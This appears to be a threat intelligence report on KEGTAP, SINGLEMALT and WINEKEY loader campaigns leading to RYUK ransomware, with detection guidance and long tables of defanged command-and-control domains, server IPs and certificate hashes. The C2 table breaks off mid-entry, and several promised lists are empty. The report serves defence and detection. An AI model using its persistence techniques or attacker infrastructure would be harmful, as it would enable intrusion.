10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.
The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.
The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.
Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:
Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:
Figure 1: Email containing internal references to target an organization’s name
Figure 2: Google Docs PDF document containing a target organization’s logo
Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.
Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.
Establish Foothold
Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.
Maintain Presence
Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.
Escalate Privileges
The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts.
Reconnaissance
The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Activity Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.
Lateral Movement
Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.
Complete Mission
Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.
If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.
An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.
Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk
Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders
SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which will trigger a failure event. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS job on a host run the command bitsadmin /list.
WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr
Value: Path to the backdoor
Figure 4: Example registry RUN key used by WINEKEY to maintain persistence
The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.
Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.
Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.
The following are additional strategies that may aid in identifying associated activity:
The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.
For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.
Sample Email Subjects / Patterns
Example Malware Family MD5s
Code Signing Certificate CNs
A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.
BEACON C2s
First Seen
|
Domain
—|—
12/11/19
|
updatemanagir[.]us
12/20/19
|
cmdupdatewin[.]com
12/26/19
|
scrservallinst[.]info
1/10/20
|
winsystemupdate[.]com
1/11/20
|
jomamba[.]best
1/13/20
|
updatewinlsass[.]com
1/16/20
|
winsysteminfo[.]com
1/20/20
|
livecheckpointsrs[.]com
1/21/20
|
ciscocheckapi[.]com
1/28/20
|
timesshifts[.]com
1/29/20
|
cylenceprotect[.]com
1/30/20
|
sophosdefence[.]com
1/30/20
|
taskshedulewin[.]com
1/30/20
|
windefenceinfo[.]com
1/30/20
|
lsasswininfo[.]com
1/30/20
|
update-wind[.]com
1/30/20
|
lsassupdate[.]com
1/30/20
|
renovatesystem[.]com
1/31/20
|
updatewinsoftr[.]com
2/2/20
|
cleardefencewin[.]com
2/2/20
|
checkwinupdate[.]com
2/2/20
|
havesetup[.]net
2/3/20
|
update-wins[.]com
2/3/20
|
conhostservice[.]com
2/4/20
|
microsoftupdateswin[.]com
2/4/20
|
iexploreservice[.]com
2/12/20
|
avrenew[.]com
2/12/20
|
target-support[.]online
2/12/20
|
web-analysis[.]live
2/14/20
|
freeallsafe[.]com
2/17/20
|
windefens[.]com
2/17/20
|
defenswin[.]com
2/17/20
|
easytus[.]com
2/17/20
|
greattus[.]com
2/17/20
|
livetus[.]com
2/17/20
|
comssite[.]com
2/17/20
|
findtus[.]com
2/17/20
|
bigtus[.]com
2/17/20
|
aaatus[.]com
2/17/20
|
besttus[.]com
2/17/20
|
firsttus[.]com
2/17/20
|
worldtus[.]com
2/26/20
|
freeoldsafe[.]com
2/26/20
|
serviceupdates[.]net
2/26/20
|
topserviceupdater[.]com
2/27/20
|
myserviceupdater[.]com
2/29/20
|
myservicebooster[.]net
2/29/20
|
servicesbooster[.]org
2/29/20
|
brainschampions[.]com
2/29/20
|
myservicebooster[.]com
2/29/20
|
topservicesbooster[.]com
2/29/20
|
servicesbooster[.]com
2/29/20
|
topservicesecurity[.]org
2/29/20
|
topservicesecurity[.]net
2/29/20
|
topsecurityservice[.]net
2/29/20
|
myyserviceupdater[.]com
2/29/20
|
topservicesupdate[.]com
2/29/20
|
topservicesecurity[.]com
2/29/20
|
servicesecurity[.]org
2/29/20
|
myserviceconnect[.]net
3/2/20
|
topservicesupdates[.]com
3/2/20
|
yoursuperservice[.]com
3/2/20
|
topservicehelper[.]com
3/2/20
|
serviceuphelper[.]com
3/2/20
|
serviceshelpers[.]com
3/2/20
|
boostsecuritys[.]com
3/3/20
|
hakunamatatata[.]com
3/8/20
|
service-updater[.]com
3/9/20
|
secondserviceupdater[.]com
3/9/20
|
twelvethserviceupdater[.]com
3/9/20
|
twentiethservicehelper[.]com
3/9/20
|
twelfthservicehelper[.]com
3/9/20
|
tenthservicehelper[.]com
3/9/20
|
thirdserviceupdater[.]com
3/9/20
|
thirdservicehelper[.]com
3/9/20
|
tenthserviceupdater[.]com
3/9/20
|
thirteenthservicehelper[.]com
3/9/20
|
seventeenthservicehelper[.]com
3/9/20
|
sixteenthservicehelper[.]com
3/9/20
|
sixthservicehelper[.]com
3/9/20
|
seventhservicehelper[.]com
3/9/20
|
seventhserviceupdater[.]com
3/9/20
|
sixthserviceupdater[.]com
3/9/20
|
secondservicehelper[.]com
3/9/20
|
ninthservicehelper[.]com
3/9/20
|
ninethserviceupdater[.]com
3/9/20
|
fourteenthservicehelper[.]com
3/9/20
|
fourthserviceupdater[.]com
3/9/20
|
firstserviceupdater[.]com
3/9/20
|
firstservisehelper[.]com
3/9/20
|
fifthserviceupdater[.]com
3/9/20
|
eleventhserviceupdater[.]com
3/9/20
|
fifthservicehelper[.]com
3/9/20
|
fourservicehelper[.]com
3/9/20
|
eighthservicehelper[.]com
3/9/20
|
eighteenthservicehelper[.]com
3/9/20
|
eighthserviceupdater[.]com
3/9/20
|
fifteenthservicehelper[.]com
3/9/20
|
nineteenthservicehelper[.]com
3/9/20
|
eleventhservicehelper[.]com
3/14/20
|
thirdservice-developer[.]com
3/14/20
|
fifthservice-developer[.]com
3/15/20
|
firstservice-developer[.]com
3/16/20
|
fourthservice-developer[.]com
3/16/20
|
ninethservice-developer[.]com
3/16/20
|
seventhservice-developer[.]com
3/16/20
|
secondservice-developer[.]com
3/16/20
|
sixthservice-developer[.]com
3/16/20
|
tenthservice-developer[.]com
3/16/20
|
eithtservice-developer[.]com
3/17/20
|
servicedupdater[.]com
3/17/20
|
service-updateer[.]com
3/19/20
|
sexyservicee[.]com
3/19/20
|
serviceboostnumberone[.]com
3/19/20
|
servicedbooster[.]com
3/19/20
|
service-hunter[.]com
3/19/20
|
servicedhunter[.]com
3/19/20
|
servicedpower[.]com
3/19/20
|
sexycservice[.]com
3/23/20
|
yourserviceupdater[.]com
3/23/20
|
top-serviceupdater[.]com
3/23/20
|
top-servicebooster[.]com
3/23/20
|
serviceshelps[.]com
3/23/20
|
servicemonsterr[.]com
3/23/20
|
servicehunterr[.]com
3/23/20
|
service-helpes[.]com
3/23/20
|
servicecheckerr[.]com
3/23/20
|
newservicehelper[.]com
3/23/20
|
huntersservice[.]com
3/23/20
|
helpforyourservice[.]com
3/23/20
|
boostyourservice[.]com
3/26/20
|
developmasters[.]com
3/26/20
|
actionshunter[.]com
5/4/20
|
info-develop[.]com
5/4/20
|
ayechecker[.]com
5/4/20
|
service-booster[.]com
9/18/20
|
zapored[.]com
9/22/20
|
gtrsqer[.]com
9/22/20
|
chalengges[.]com
9/22/20
|
caonimas[.]com
9/22/20
|
hakunaman[.]com
9/22/20
|
getinformationss[.]com
9/22/20
|
nomadfunclub[.]com
9/22/20
|
harddagger[.]com
9/22/20
|
errvghu[.]com
9/22/20
|
reginds[.]com
9/22/20
|
gameleaderr[.]com
9/22/20
|
razorses[.]com
9/22/20
|
vnuret[.]com
9/22/20
|
regbed[.]com
9/22/20
|
bouths[.]com
9/23/20
|
ayiyas[.]com
9/23/20
|
serviceswork[.]net
9/23/20
|
moonshardd[.]com
9/23/20
|
hurrypotter[.]com
9/23/20
|
biliyilish[.]com
9/23/20
|
blackhoall[.]com
9/23/20
|
checkhunterr[.]com
9/23/20
|
daggerclip[.]com
9/23/20
|
check4list[.]com
9/24/20
|
chainnss[.]com
9/29/20
|
hungrrybaby[.]com
9/30/20
|
martahzz[.]com
10/1/20
|
jonsonsbabyy[.]com
10/1/20
|
wondergodst[.]com
10/1/20
|
zetrexx[.]com
10/1/20
|
tiancaii[.]com
10/1/20
|
cantliee[.]com
10/1/20
|
realgamess[.]com
10/1/20
|
maybebaybe[.]com
10/1/20
|
saynoforbubble[.]com
10/1/20
|
chekingking[.]com
10/1/20
|
rapirasa[.]com
10/1/20
|
raidbossa[.]com
10/1/20
|
mountasd[.]com
10/1/20
|
puckhunterrr[.]com
10/1/20
|
pudgeee[.]com
10/1/20
|
loockfinderrs[.]com
10/1/20
|
lindasak[.]com
10/1/20
|
bithunterr[.]com
10/1/20
|
voiddas[.]com
10/1/20
|
sibalsakie[.]com
10/1/20
|
giveasees[.]com
10/1/20
|
shabihere[.]com
10/1/20
|
tarhungangster[.]com
10/1/20
|
imagodd[.]com
10/1/20
|
raaidboss[.]com
10/1/20
|
sunofgodd[.]com
10/1/20
|
rulemonster[.]com
10/1/20
|
loxliver[.]com
10/1/20
|
servicegungster[.]com
10/1/20
|
kungfupandasa[.]com
10/2/20
|
check1domains[.]com
10/5/20
|
sweetmonsterr[.]com
10/5/20
|
qascker[.]com
10/7/20
|
remotessa[.]com
10/7/20
|
cheapshhot[.]com
10/7/20
|
havemosts[.]com
10/7/20
|
unlockwsa[.]com
10/7/20
|
sobcase[.]com
10/7/20
|
zhameharden[.]com
10/7/20
|
mixunderax[.]com
10/7/20
|
bugsbunnyy[.]com
10/7/20
|
fastbloodhunter[.]com
10/7/20
|
serviceboosterr[.]com
10/7/20
|
servicewikii[.]com
10/7/20
|
secondlivve[.]com
10/7/20
|
quwasd[.]com
10/7/20
|
luckyhunterrs[.]com
10/7/20
|
wodemayaa[.]com
10/7/20
|
hybriqdjs[.]com
10/7/20
|
gunsdrag[.]com
10/7/20
|
gungameon[.]com
10/7/20
|
servicemount[.]com
10/7/20
|
servicesupdater[.]com
10/7/20
|
service-boosterr[.]com
10/7/20
|
serviceupdatter[.]com
10/7/20
|
dotmaingame[.]com
10/12/20
|
backup1service[.]com
10/13/20
|
bakcup-monster[.]com
10/13/20
|
bakcup-checker[.]com
10/13/20
|
backup-simple[.]com
10/13/20
|
backup-leader[.]com
10/13/20
|
backup-helper[.]com
10/13/20
|
service-checker[.]com
10/13/20
|
nasmastrservice[.]com
10/14/20
|
service-leader[.]com
10/14/20
|
nas-simple-helper[.]com
10/14/20
|
nas-leader[.]com
10/14/20
|
boost-servicess[.]com
10/14/20
|
elephantdrrive[.]com
10/15/20
|
service-hellper[.]com
10/16/20
|
top-backuphelper[.]com
10/16/20
|
best-nas[.]com
10/16/20
|
top-backupservice[.]com
10/16/20
|
bestservicehelper[.]com
10/16/20
|
backupnas1[.]com
10/16/20
|
backupmastter[.]com
10/16/20
|
best-backup[.]com
10/17/20
|
viewdrivers[.]com
10/19/20
|
topservicebooster[.]com
10/19/20
|
topservice-masters[.]com
10/19/20
|
topbackupintheworld[.]com
10/19/20
|
topbackup-helper[.]com
10/19/20
|
simple-backupbooster[.]com
10/19/20
|
top3-services[.]com
10/19/20
|
backup1services[.]com
10/21/20
|
backupmaster-service[.]com
10/21/20
|
backupmasterservice[.]com
10/21/20
|
service1updater[.]com
10/21/20
|
driverdwl[.]com
10/21/20
|
backup1master[.]com
10/21/20
|
boost-yourservice[.]com
10/21/20
|
checktodrivers[.]com
10/21/20
|
backup1helper[.]com
10/21/20
|
driver1updater[.]com
10/21/20
|
driver1master[.]com
10/23/20
|
view-backup[.]com
10/23/20
|
top3servicebooster[.]com
10/23/20
|
servicereader[.]com
10/23/20
|
servicehel[.]com
10/23/20
|
driver-boosters[.]com
10/23/20
|
service1update[.]com
10/23/20
|
service-hel[.]com
10/23/20
|
driver1downloads[.]com
10/23/20
|
service1view[.]com
10/23/20
|
backups1helper[.]com
10/25/20
|
idriveview[.]com
10/26/20
|
debug-service[.]com
10/26/20
|
idrivedwn[.]com
10/28/20
|
driverjumper[.]com
10/28/20
|
service1boost[.]com
10/28/20
|
idriveupdate[.]com
10/28/20
|
idrivehepler[.]com
10/28/20
|
idrivefinder[.]com
10/28/20
|
idrivecheck[.]com
10/28/20
|
idrivedownload[.]com
First Seen
|
Server
|
Subject
|
MD5
—|—|—|—
12/12/19
|
140.82.60.155:443
|
CN=updatemanagir[.]us
|
ec16be328c09473d5e5c07310583d85a
12/21/19
|
96.30.192.141:443
|
CN=cmdupdatewin[.]com
|
3d4de17df25412bb714fda069f6eb27e
1/6/20
|
45.76.49.78:443
|
CN=scrservallinst[.]info
|
cd6035bd51a44b597c1e181576dd44d9
1/8/20
|
149.248.58.11:443
|
CN=updatewinlsass[.]com
|
8c581979bd11138ffa3a25b895b97cc0
1/9/20
|
96.30.193.57:443
|
CN=winsystemupdate[.]com
|
e4e732502b9658ea3380847c60b9e0fe
1/14/20
|
95.179.219.169:443
|
CN=jomamba[.]best
|
80b7001e5a6e4bd6ec79515769b91c8b
1/16/20
|
140.82.27.146:443
|
CN=winsysteminfo[.]com
|
29e656ba9d5d38a0c17a4f0dd855b37e
1/19/20
|
45.32.170.9:443
|
CN=livecheckpointsrs[.]com
|
1de9e9aa8363751c8a71c43255557a97
1/20/20
|
207.148.8.61:443
|
CN=ciscocheckapi[.]com
|
97ca76ee9f02cfda2e8e9729f69bc208
1/28/20
|
209.222.108.106:443
|
CN=timesshifts[.]com
|
2bb464585f42180bddccb50c4a4208a5
1/29/20
|
31.7.59.141:443
|
CN=updatewinsoftr[.]com
|
07f9f766163c344b0522e4e917035fe1
1/29/20
|
79.124.60.117:443
|
C=US
|
9722acc9740d831317dd8c1f20d8cfbe
1/29/20
|
66.42.86.61:443
|
CN=lsassupdate[.]com
|
3c9b3f1e12473a0fd28dc37071168870
1/29/20
|
45.76.20.140:443
|
CN=cylenceprotect[.]com
|
da6ce63f4a52244c3dced32f7164038a
1/29/20
|
45.76.20.140:80
|
CN=cylenceprotect[.]com
|
da6ce63f4a52244c3dced32f7164038a
1/30/20
|
149.248.5.240:443
|
CN=sophosdefence[.]com
|
e9b4b649c97cdd895d6a0c56015f2e68
1/30/20
|
144.202.12.197:80
|
CN=windefenceinfo[.]com
|
c6c63024b18f0c5828bd38d285e6aa58
1/30/20
|
149.248.5.240:80
|
CN=sophosdefence[.]com
|
e9b4b649c97cdd895d6a0c56015f2e68
1/30/20
|
149.28.246.25:80
|
CN=lsasswininfo[.]com
|
f9af8b7ddd4875224c7ce8aae8c1b9dd
1/30/20
|
144.202.12.197:443
|
CN=windefenceinfo[.]com
|
c6c63024b18f0c5828bd38d285e6aa58
1/30/20
|
149.28.246.25:443
|
CN=lsasswininfo[.]com
|
f9af8b7ddd4875224c7ce8aae8c1b9dd
1/30/20
|
45.77.119.212:443
|
CN=taskshedulewin[.]com
|
e1dc7cecd3cb225b131bdb71df4b3079
1/30/20
|
45.77.119.212:80
|
CN=taskshedulewin[.]com
|
e1dc7cecd3cb225b131bdb71df4b3079
1/30/20
|
149.28.122.130:443
|
CN=renovatesystem[.]com
|
734c26d93201cf0c918135915fdf96af
1/30/20
|
45.32.170.9:80
|
CN=livecheckpointsrs[.]com
|
1de9e9aa8363751c8a71c43255557a97
1/30/20
|
149.248.58.11:80
|
CN=updatewinlsass[.]com
|
8c581979bd11138ffa3a25b895b97cc0
1/30/20
|
149.28.122.130:80
|
CN=renovatesystem[.]com
|
734c26d93201cf0c918135915fdf96af
1/30/20
|
207.148.8.61:80
|
CN=ciscocheckapi[.]com
|
97ca76ee9f02cfda2e8e9729f69bc208
1/31/20
|
81.17.25.210:443
|
CN=update-wind[.]com
|
877bf6c685b68e6ddf23a4db3789fcaa
1/31/20
|
31.7.59.141:80
|
CN=updatewinsoftr[.]com
|
07f9f766163c344b0522e4e917035fe1
2/2/20
|
155.138.214.247:80
|
CN=cleardefencewin[.]com
|
61df4864dc2970de6dcee65827cc9a54
2/2/20
|
155.138.214.247:443
|
CN=cleardefencewin[.]com
|
61df4864dc2970de6dcee65827cc9a54
2/2/20
|
45.76.231.195:443
|
CN=checkwinupdate[.]com
|
d8e5dddeec1a9b366759c7ef624d3b8c
2/2/20
|
45.76.231.195:80
|
CN=checkwinupdate[.]com
|
d8e5dddeec1a9b366759c7ef624d3b8c
2/3/20
|
46.19.142.154:443
|
CN=havesetup[.]net
|
cd354c309f3229aff59751e329d8243a
2/3/20
|
95.179.219.169:80
|
CN=jomamba[.]best
|
80b7001e5a6e4bd6ec79515769b91c8b
2/3/20
|
140.82.60.155:80
|
CN=updatemanagir[.]us
|
ec16be328c09473d5e5c07310583d85a
2/3/20
|
209.222.108.106:80
|
CN=timesshifts[.]com
|
2bb464585f42180bddccb50c4a4208a5
2/3/20
|
66.42.118.123:443
|
CN=conhostservice[.]com
|
6c21d3c5f6e8601e92ae167a7cff721c
2/4/20
|
80.240.18.106:443
|
CN=microsoftupdateswin[.]com
|
27cae092ad6fca89cd1b05ef1bb73e62
2/4/20
|
95.179.215.228:443
|
CN=iexploreservice[.]com
|
26010bebe046b3a33bacd805c2617610
2/12/20
|
155.138.216.133:443
|
CN=defenswin[.]com
|
e5005ae0771fcc165772a154b7937e89
2/12/20
|
45.32.130.5:443
|
CN=avrenew[.]com
|
f32ee1bb35102e5d98af81946726ec1b
2/14/20
|
45.76.167.35:443
|
CN=freeallsafe[.]com
|
85f743a071a1d0b74d8e8322fecf832b
2/14/20
|
45.63.95.187:443
|
CN=easytus[.]com
|
17de38c58e04242ee56a9f3a94e6fd53
2/17/20
|
45.77.89.31:443
|
CN=besttus[.]com
|
2bda8217bdb05642c995401af3b5c1f3
2/17/20
|
95.179.147.215:443
|
CN=windefens[.]com
|
57725c8db6b98a3361e0d905a697f9f8
2/17/20
|
155.138.216.133:443
|
CN=defenswin[.]com
|
c07774a256fc19036f5c8c60ba418cbf
2/17/20
|
104.238.190.126:443
|
CN=aaatus[.]com
|
4039af00ce7a5287a3e564918edb77cf
2/17/20
|
144.202.83.4:443
|
CN=greattus[.]com
|
7f0fa9a608090634b42f5f17b8cecff0
2/17/20
|
104.156.245.0:443
|
CN=comssite[.]com
|
f5bb98fafe428be6a8765e98683ab115
2/17/20
|
45.32.30.162:443
|
CN=bigtus[.]com
|
698fc23ae111381183d0b92fe343b28b
2/17/20
|
108.61.242.184:443
|
CN=livetus[.]com
|
8bedba70f882c45f968c2d99b00a708a
2/17/20
|
207.148.15.31:443
|
CN=findtus[.]com
|
15f07ca2f533f0954bbbc8d4c64f3262
2/17/20
|
149.28.15.247:443
|
CN=firsttus[.]com
|
88e8551f4364fc647dbf00796536a4c7
2/21/20
|
155.138.136.182:443
|
CN=worldtus[.]com
|
b31f38b2ccbbebf4018fe5665173a409
2/25/20
|
45.77.58.172:443
|
CN=freeoldsafe[.]com
|
a46e77b92e1cdfec82239ff54f2c1115
2/25/20
|
45.77.58.172:443
|
CN=freeoldsafe[.]com
|
a46e77b92e1cdfec82239ff54f2c1115
2/26/20
|
108.61.72.29:443
|
CN=myserviceconnect[.]net
|
9f551008f6dcaf8e6fe363caa11a1aed
2/27/20
|
216.155.157.249:443
|
CN=myserviceupdater[.]com
|
4c6a2c06f1e1d15d6be8c81172d1c50c
2/28/20
|
45.77.98.157:443
|
CN=topservicesbooster[.]com
|
ba4b34962390893852e5cc7fa7c75ba2
2/28/20
|
104.156.250.132:443
|
CN=myservicebooster[.]com
|
89be5670d19608b2c8e261f6301620e1
2/28/20
|
149.28.50.31:443
|
CN=topsecurityservice[.]net
|
77e2878842ab26beaa3ff24a5b64f09b
2/28/20
|
149.28.55.197:443
|
CN=myyserviceupdater[.]com
|
0dd8fde668ff8a301390eef1ad2f9b83
2/28/20
|
207.246.67.70:443
|
CN=servicesecurity[.]org
|
c88098f9a92d7256425f782440971497
2/28/20
|
63.209.33.131:443
|
CN=serviceupdates[.]net
|
16e86a9be2bdf0ddc896bc48fcdbb632
2/29/20
|
45.77.206.105:443
|
CN=myservicebooster[.]net
|
6e09bb541b29be7b89427f9227c30a32
2/29/20
|
140.82.5.67:443
|
CN=servicesbooster[.]org
|
42d2d09d08f60782dc4cded98d7984ed
2/29/20
|
108.61.209.123:443
|
CN=brainschampions[.]com
|
241ab042cdcb29df0a5c4f853f23dd31
2/29/20
|
104.156.227.250:443
|
CN=servicesbooster[.]com
|
f45f9296ff2a6489a4f39cd79c7f5169
2/29/20
|
140.82.10.222:443
|
CN=topservicesecurity[.]net
|
b9375e7df4ee0f83d7abb179039dc2c5
2/29/20
|
149.28.35.35:443
|
CN=topservicesecurity[.]org
|
82bd8a2b743c7cc3f3820e386368951d
2/29/20
|
207.148.21.17:443
|
CN=topserviceupdater[.]com
|
ece184f8a1309b781f912d4f4d65738e
2/29/20
|
45.77.153.72:443
|
CN=topservicesupdate[.]com
|
8330c3fa8ca31a76dc8d7818fd378794
3/1/20
|
140.82.10.222:80
|
CN=topservicesecurity[.]net
|
b9375e7df4ee0f83d7abb179039dc2c5
3/1/20
|
207.148.21.17:80
|
CN=topserviceupdater[.]com
|
ece184f8a1309b781f912d4f4d65738e
3/1/20
|
108.61.90.90:443
|
CN=topservicesecurity[.]com
|
696aeb86d085e4f6032e0a01c496d26c
3/1/20
|
45.32.130.5:80
|
CN=avrenew[.]com
|
f32ee1bb35102e5d98af81946726ec1b
3/2/20
|
217.69.15.175:443
|
CN=serviceshelpers[.]com
|
9a437489c9b2c19c304d980c17d2e0e9
3/2/20
|
155.138.135.182:443
|
CN=topservicesupdates[.]com
|
b9deff0804244b52b14576eac260fd9f
3/2/20
|
95.179.210.8:80
|
CN=serviceuphelper[.]com
|
bb65efcead5b979baee5a25756e005d8
3/2/20
|
45.76.45.162:443
|
CN=boostsecuritys[.]com
|
7d316c63bdc4e981344e84a017ae0212
3/4/20
|
108.61.176.237:443
|
CN=yoursuperservice[.]com
|
7424aaede2f35259cf040f3e70d707be
3/4/20
|
207.246.67.70:443
|
CN=servicesecurity[.]org
|
d66cb5528d2610b39bc3cecc20198970
3/6/20
|
188.166.52.176:443
|
CN=top-servicebooster[.]com
|
f882c11b294a94494f75ded47f6f0ca0
3/7/20
|
149.248.56.113:443
|
CN=topservicehelper[.]com
|
2a29e359126ec5b746b1cc52354b4adf
3/8/20
|
199.247.13.144:443
|
CN=hakunamatatata[.]com
|
e2cd3c7e2900e2764da64a719096c0cb
3/8/20
|
95.179.210.8:443
|
CN=serviceuphelper[.]com
|
bb65efcead5b979baee5a25756e005d8
3/8/20
|
207.246.67.70:443
|
CN=servicesecurity[.]org
|
d89f6bdc59ed5a1ab3c1ecb53c6e571c
3/9/20
|
194.26.29.230:443
|
CN=secondserviceupdater[.]com
|
c30a4809c9a77cfc09314a63f7055bf7
3/9/20
|
194.26.29.229:443
|
CN=firstserviceupdater[.]com
|
bc86a3087f238014b6c3a09c2dc3df42
3/9/20
|
194.26.29.232:443
|
CN=fourthserviceupdater[.]com
|
3dc6d12c56cc79b0e3e8cd7b8a9c320b
3/9/20
|
194.26.29.234:443
|
CN=sixthserviceupdater[.]com
|
951e29ee8152c1e7f63e8ccb6b7031c1
3/9/20
|
194.26.29.235:443
|
CN=seventhserviceupdater[.]com
|
abe1ce0f83459a7fe9c72839fc46330b
3/9/20
|
194.26.29.236:443
|
CN=eighthserviceupdater[.]com
|
c7a539cffdd230a4ac9a4754c2c68f12
3/9/20
|
194.26.29.237:443
|
CN=ninethserviceupdater[.]com
|
1d1f7bf2c0eec7a3a0221fd473ddbafc
3/9/20
|
194.26.29.225:443
|
CN=seventeenthservicehelper[.]com
|
6b1e0621f4d891b8575a229384d0732d
3/9/20
|
194.26.29.227:443
|
CN=nineteenthservicehelper[.]com
|
38756ffb8f2962f6071e770637a2d962
3/9/20
|
194.26.29.242:443
|
CN=thirdservicehelper[.]com
|
3b911032d08ff4cb156c064bc272d935
3/9/20
|
194.26.29.244:443
|
CN=tenthservicehelper[.]com
|
a2d9b382fe32b0139197258e3e2925c4
3/9/20
|
194.26.29.226:443
|
CN=eighteenthservicehelper[.]com
|
4acbca8efccafd92da9006d0cc91b264
3/9/20
|
194.26.29.243:443
|
CN=ninthservicehelper[.]com
|
0760ab4a6ed9a124aabb8c377beead54
3/9/20
|
194.26.29.201:443
|
CN=secondservicehelper[.]com
|
d8a8d0ad9226e3c968c58b5d2324d899
3/9/20
|
194.26.29.202:443
|
CN=thirdservicehelper[.]com
|
0d3b79158ceee5b6ce859bb3fc501b02
3/9/20
|
194.26.29.220:443
|
CN=fourservicehelper[.]com
|
831e0445ea580091275b7020f2153b08
3/11/20
|
207.246.67.70:80
|
CN=servicesecurity[.]org
|
d89f6bdc59ed5a1ab3c1ecb53c6e571c
3/13/20
|
165.227.196.0:443
|
CN=twentiethservicehelper[.]com
|
977b4abc6307a9b3732229d4d8e2c277
3/14/20
|
45.141.86.91:443
|
CN=thirdservice-developer[.]com
|
edc2680e3797e11e93573e523bae7265
3/14/20
|
194.26.29.219:443
|
CN=firstservisehelper[.]com
|
6b444a2cd3e12d4c3feadec43a30c4d6
3/14/20
|
45.141.86.93:443
|
CN=fifthservice-developer[.]com
|
60e7500c809f12fe6be5681bd41a0eda
3/15/20
|
45.141.86.90:443
|
CN=secondservice-developer[.]com
|
de9460bd6b1badb7d8314a381d143906
3/15/20
|
45.141.86.84:443
|
CN=firstservice-developer[.]com
|
